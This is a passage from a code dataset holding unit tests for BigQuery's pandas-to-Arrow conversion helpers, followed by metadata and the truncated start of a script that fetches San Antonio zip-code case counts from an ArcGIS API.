Conversion from pyarrow\n # TimestampArray to list of Python objects fails with OverflowError:\n # Python int too large to convert to C long.\n #\n # (\n # \"TIMESTAMP\",\n # [\n # datetime.datetime(1, 1, 1, 0, 0, 0, tzinfo=pytz.utc),\n # None,\n # datetime.datetime(9999, 12, 31, 23, 59, 59, 999999, tzinfo=pytz.utc),\n # datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=pytz.utc),\n # ],\n # ),\n (\n \"DATE\",\n [\n datetime.date(1, 1, 1),\n None,\n datetime.date(9999, 12, 31),\n datetime.date(1970, 1, 1),\n ],\n ),\n (\n \"TIME\",\n [\n datetime.time(0, 0, 0),\n None,\n datetime.time(23, 59, 59, 999999),\n datetime.time(12, 0, 0),\n ],\n ),\n # TODO: Once https://issues.apache.org/jira/browse/ARROW-5450 is\n # resolved, test with DATETIME column. Conversion from pyarrow\n # TimestampArray to list of Python objects fails with OverflowError:\n # Python int too large to convert to C long.\n #\n # (\n # \"DATETIME\",\n # [\n # datetime.datetime(1, 1, 1, 0, 0, 0),\n # None,\n # datetime.datetime(9999, 12, 31, 23, 59, 59, 999999),\n # datetime.datetime(1970, 1, 1, 0, 0, 0),\n # ],\n # ),\n (\n \"GEOGRAPHY\",\n [\n \"POINT(30 10)\",\n None,\n \"LINESTRING (30 10, 10 30, 40 40)\",\n \"POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))\",\n ],\n ),\n ],\n)\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_nullable_scalars(module_under_test, bq_type, rows):\n series = pandas.Series(rows, dtype=\"object\")\n bq_field = schema.SchemaField(\"field_name\", bq_type)\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert rows == roundtrip\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_arrays(module_under_test):\n rows = [[1, 2, 3], [], [4, 5, 6]]\n series = pandas.Series(rows, dtype=\"object\")\n bq_field = schema.SchemaField(\"field_name\", \"INTEGER\", mode=\"REPEATED\")\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert rows == roundtrip\n\n\n@pytest.mark.parametrize(\"bq_type\", [\"RECORD\", \"record\", \"STRUCT\", \"struct\"])\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_structs(module_under_test, bq_type):\n rows = [\n {\"int_col\": 123, \"string_col\": \"abc\"},\n None,\n {\"int_col\": 456, \"string_col\": \"def\"},\n ]\n series = pandas.Series(rows, dtype=\"object\")\n bq_field = schema.SchemaField(\n \"field_name\",\n bq_type,\n fields=(\n schema.SchemaField(\"int_col\", \"INTEGER\"),\n schema.SchemaField(\"string_col\", \"STRING\"),\n ),\n )\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert rows == roundtrip\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_array_w_special_floats(module_under_test):\n bq_field = schema.SchemaField(\"field_name\", \"FLOAT64\")\n rows = [float(\"-inf\"), float(\"nan\"), float(\"inf\"), None]\n series = pandas.Series(rows, dtype=\"object\")\n arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)\n roundtrip = arrow_array.to_pylist()\n assert len(rows) == len(roundtrip)\n assert roundtrip[0] == float(\"-inf\")\n assert roundtrip[1] != roundtrip[1] # NaN doesn't 
equal itself.\n assert roundtrip[2] == float(\"inf\")\n assert roundtrip[3] is None\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_to_arrow_w_required_fields(module_under_test):\n bq_schema = (\n schema.SchemaField(\"field01\", \"STRING\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field02\", \"BYTES\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field03\", \"INTEGER\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field04\", \"INT64\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field05\", \"FLOAT\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field06\", \"FLOAT64\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field07\", \"NUMERIC\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field08\", \"BOOLEAN\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field09\", \"BOOL\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field10\", \"TIMESTAMP\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field11\", \"DATE\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field12\", \"TIME\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field13\", \"DATETIME\", mode=\"REQUIRED\"),\n schema.SchemaField(\"field14\", \"GEOGRAPHY\", mode=\"REQUIRED\"),\n )\n dataframe = pandas.DataFrame(\n {\n \"field01\": [\"hello\", \"world\"],\n \"field02\": [b\"abd\", b\"efg\"],\n \"field03\": [1, 2],\n \"field04\": [3, 4],\n \"field05\": [1.25, 9.75],\n \"field06\": [-1.75, -3.5],\n \"field07\": [decimal.Decimal(\"1.2345\"), decimal.Decimal(\"6.7891\")],\n \"field08\": [True, False],\n \"field09\": [False, True],\n \"field10\": [\n datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=pytz.utc),\n datetime.datetime(2012, 12, 21, 9, 7, 42, tzinfo=pytz.utc),\n ],\n \"field11\": [datetime.date(9999, 12, 31), datetime.date(1970, 1, 1)],\n \"field12\": [datetime.time(23, 59, 59, 999999), datetime.time(12, 0, 0)],\n \"field13\": [\n datetime.datetime(1970, 1, 1, 0, 0, 0),\n datetime.datetime(2012, 12, 21, 9, 7, 42),\n ],\n \"field14\": [\n \"POINT(30 10)\",\n \"POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))\",\n ],\n }\n )\n\n arrow_table = module_under_test.to_arrow(dataframe, bq_schema)\n arrow_schema = arrow_table.schema\n\n assert len(arrow_schema) == len(bq_schema)\n for arrow_field in arrow_schema:\n assert not arrow_field.nullable\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_to_arrow_w_unknown_type(module_under_test):\n bq_schema = (\n schema.SchemaField(\"field00\", \"UNKNOWN_TYPE\"),\n schema.SchemaField(\"field01\", \"STRING\"),\n schema.SchemaField(\"field02\", \"BYTES\"),\n schema.SchemaField(\"field03\", \"INTEGER\"),\n )\n dataframe = pandas.DataFrame(\n {\n \"field00\": [\"whoami\", \"whatami\"],\n \"field01\": [\"hello\", \"world\"],\n \"field02\": [b\"abd\", b\"efg\"],\n \"field03\": [1, 2],\n }\n )\n\n with warnings.catch_warnings(record=True) as warned:\n arrow_table = module_under_test.to_arrow(dataframe, bq_schema)\n arrow_schema = arrow_table.schema\n\n assert len(warned) == 1\n warning = warned[0]\n assert \"field00\" in str(warning)\n\n assert len(arrow_schema) == len(bq_schema)\n assert arrow_schema[0].name == \"field00\"\n assert arrow_schema[1].name == \"field01\"\n assert arrow_schema[2].name == \"field02\"\n assert arrow_schema[3].name == \"field03\"\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\ndef test_to_parquet_without_pyarrow(module_under_test, monkeypatch):\n monkeypatch.setattr(module_under_test, \"pyarrow\", None)\n with 
pytest.raises(ValueError) as exc:\n module_under_test.to_parquet(pandas.DataFrame(), (), None)\n assert \"pyarrow is required\" in str(exc)\n\n\n@pytest.mark.skipIf(pandas is None, \"Requires `pandas`\")\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_to_parquet_w_missing_columns(module_under_test, monkeypatch):\n with pytest.raises(ValueError) as exc:\n module_under_test.to_parquet(\n pandas.DataFrame(), (schema.SchemaField(\"not_found\", \"STRING\"),), None\n )\n assert \"columns in schema must match\" in str(exc)\n", "sub_path": "bigquery/tests/unit/test__pandas_helpers.py", "file_name": "test__pandas_helpers.py", "file_ext": "py", "file_size_in_byte": 19425, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.bigquery._pandas_helpers", "line_number": 39, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 67, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 78, "usage_type": "call"}, {"api_name": "pyarrow.timestamp", "line_number": 83, "usage_type": "call"}, {"api_name": "pyarrow.timestamp", "line_number": 84, "usage_type": "call"}, {"api_name": "pyarrow.timestamp", "line_number": 85, "usage_type": "call"}, {"api_name": "pyarrow.string", "line_number": 86, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 81, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 247, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 247, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 100, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 127, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 135, 
"usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 143, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_binary", "line_number": 151, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 158, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_int64", "line_number": 159, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 166, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_int64", "line_number": 167, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_float64", "line_number": 175, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_float64", "line_number": 183, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 189, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_boolean", "line_number": 196, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 203, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_boolean", "line_number": 204, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 210, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 216, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_date32", "line_number": 217, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_time64", "line_number": 225, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pyarrow.types", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pyarrow.types.is_string", "line_number": 238, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 238, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 245, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 245, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 256, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 256, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 257, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 257, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", 
"line_number": 258, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 258, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 259, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 259, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 260, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 260, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 261, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 261, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 262, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 262, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 263, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 263, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 264, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 264, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 265, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 265, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 266, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 266, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 267, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 267, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 268, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 268, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 269, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 269, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 271, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 271, "usage_type": "name"}, {"api_name": "pyarrow.struct", "line_number": 273, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 275, "usage_type": "call"}, {"api_name": "pyarrow.string", "line_number": 275, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 276, "usage_type": "call"}, {"api_name": "pyarrow.binary", "line_number": 276, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 277, "usage_type": "call"}, {"api_name": "pyarrow.int64", "line_number": 277, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 278, "usage_type": "call"}, {"api_name": "pyarrow.int64", "line_number": 278, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 279, "usage_type": "call"}, {"api_name": "pyarrow.float64", "line_number": 279, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 280, "usage_type": "call"}, {"api_name": "pyarrow.float64", "line_number": 280, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 281, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 282, "usage_type": "call"}, {"api_name": "pyarrow.bool_", "line_number": 282, "usage_type": 
"call"}, {"api_name": "pyarrow.field", "line_number": 283, "usage_type": "call"}, {"api_name": "pyarrow.bool_", "line_number": 283, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 284, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 285, "usage_type": "call"}, {"api_name": "pyarrow.date32", "line_number": 285, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 286, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 287, "usage_type": "call"}, {"api_name": "pyarrow.field", "line_number": 288, "usage_type": "call"}, {"api_name": "pyarrow.string", "line_number": 288, "usage_type": "call"}, {"api_name": "pyarrow.types.is_struct", "line_number": 291, "usage_type": "call"}, {"api_name": "pyarrow.types", "line_number": 291, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 252, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 253, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 253, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 299, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 299, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 300, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 300, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 303, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 303, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 305, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 305, "usage_type": "name"}, {"api_name": "pytest.mark.skipIf", "line_number": 296, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 296, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 389, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 390, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 390, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 310, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 310, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 321, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 323, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 324, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 346, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 348, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 349, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 355, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 357, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 358, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 386, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 387, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 387, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 400, "usage_type": "call"}, {"api_name": 
"google.cloud.bigquery.schema.SchemaField", "line_number": 401, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 401, "usage_type": "name"}, {"api_name": "pytest.mark.skipIf", "line_number": 396, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 396, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 397, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 397, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 416, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 417, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 417, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 421, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 421, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 422, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 422, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 407, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 407, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 408, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 408, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 409, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 409, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 433, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 433, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 435, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 430, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 430, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 431, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 431, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 449, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 449, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 450, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 450, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 451, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 451, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 452, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 452, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 453, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 453, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 454, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 454, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 455, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 455, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 456, 
"usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 456, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 457, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 457, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 458, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 458, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 459, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 459, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 460, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 460, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 461, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 461, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 462, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 462, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 464, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 472, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 476, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 476, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 477, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 477, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 479, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 480, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 482, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 483, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 445, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 445, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 446, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 446, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 504, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 504, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 505, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 505, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 506, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 506, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 507, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 507, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 509, "usage_type": "call"}, {"api_name": "warnings.catch_warnings", "line_number": 518, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 500, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 500, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 501, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 501, "usage_type": "attribute"}, {"api_name": "pytest.raises", 
"line_number": 536, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 537, "usage_type": "call"}, {"api_name": "pytest.mark.skipIf", "line_number": 533, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 533, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 544, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 546, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema.SchemaField", "line_number": 546, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.schema", "line_number": 546, "usage_type": "name"}, {"api_name": "pytest.mark.skipIf", "line_number": 541, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 541, "usage_type": "attribute"}, {"api_name": "pytest.mark.skipIf", "line_number": 542, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 542, "usage_type": "attribute"}]} +{"seq_id": "202133286", "text": "import requests\nimport os, sys, time\nimport parse_data_utils\nfrom datetime import datetime\n\n# ===========================================\n# Grab update time information\n# ===========================================\n\n# Page only tells \"Updated daily at 7 PM [CDT]\"\n# as of 4/19/2020. Thus, just take current date.\n# Make sure to run this between 5 and 11:59 PM\n# for Pacific time!\n\n# Need date in format MM/DD/YYYY\ndate_parts = str(datetime.date(datetime.now())).split('-')\ndate = date_parts[1] + '/' + date_parts[2] + '/' + date_parts[0]\n\n# ===========================================\n# Grab current zip code-case counts data\n# ===========================================\n\nsan_antonio_url = \"https://services.arcgis.com/g1fRTDLeMgspWrYp/arcgis/rest/services/vBexarCountyZipCodes_EnrichClip/FeatureServer/0/query?f=json&where=1%3D1&returnGeometry=false&outFields=*&orderByFields=ZIP_CODE%20asc\"\nsan_antonio_case_field = u'CasesP100000'\n\nresponse = requests.get(san_antonio_url) # REST API query\n\ntry:\n\tall_zip_json = response.json()[u'features']\nexcept:\n\tsys.exit(\"ERROR: JSON response does not have 'features' field. 
